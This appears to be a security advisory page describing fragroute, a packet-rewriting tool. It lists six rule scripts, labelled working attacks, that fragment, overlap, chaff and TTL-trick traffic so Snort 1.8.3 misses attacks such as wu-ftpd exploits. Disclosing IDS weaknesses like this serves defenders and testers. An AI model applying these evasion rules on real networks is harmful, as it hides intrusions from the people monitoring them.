|
Brought to you by:
Suppliers of:
|
|
|
| |
Fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998.
It features a simple rule set language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior.
The tool can be used to blindside Snort into not detecting the latest wu-ftpd exploits when fragroute is executed with the "tcp_seg 1 new" option turned on. The following is a list of fragroute scripts that can be used to blind Snort into not detecting attacks. |
| |
Credit:
The information has been provided by 0xcafebabe.
|
| |
Working Attacks against snort-1.8.3:
1. Older TCP retransmission chaff (snort's TCP segment reassembly seems to always favor newer data, even for properly sequenced received data):
tcp_seg 1
tcp_chaff rexmit
order random
2. Forward TCP segmentation overlap, favoring newer data (both Windows and Unix operate this way, in contrast to Ptacek and Newsham's results):
tcp_seg 1 new
3. Chaff TCP segments with older TCP timestamp options forcing PAWS elimination:
tcp_seg 1
tcp_chaff paws
order random
4. Older IP fragment duplicates (Snort's IP fragment reassembly seems to always favor newer data, even for properly sequenced received data):
ip_frag 8
ip_chaff dup
order random
5. IP duplicate fragment chaff with bad options:
ip_frag 8
ip_chaff opt
order random
6. Either TCP or IP chaffing with short TTLs (that expire before reaching the end host, but pass by the monitor):
ip_frag 8
ip_ttl 11
ip_chaff 10
order random
tcp_seg 1
ip_ttl 11
tcp_chaff 10
order random
|
|
|
|
|
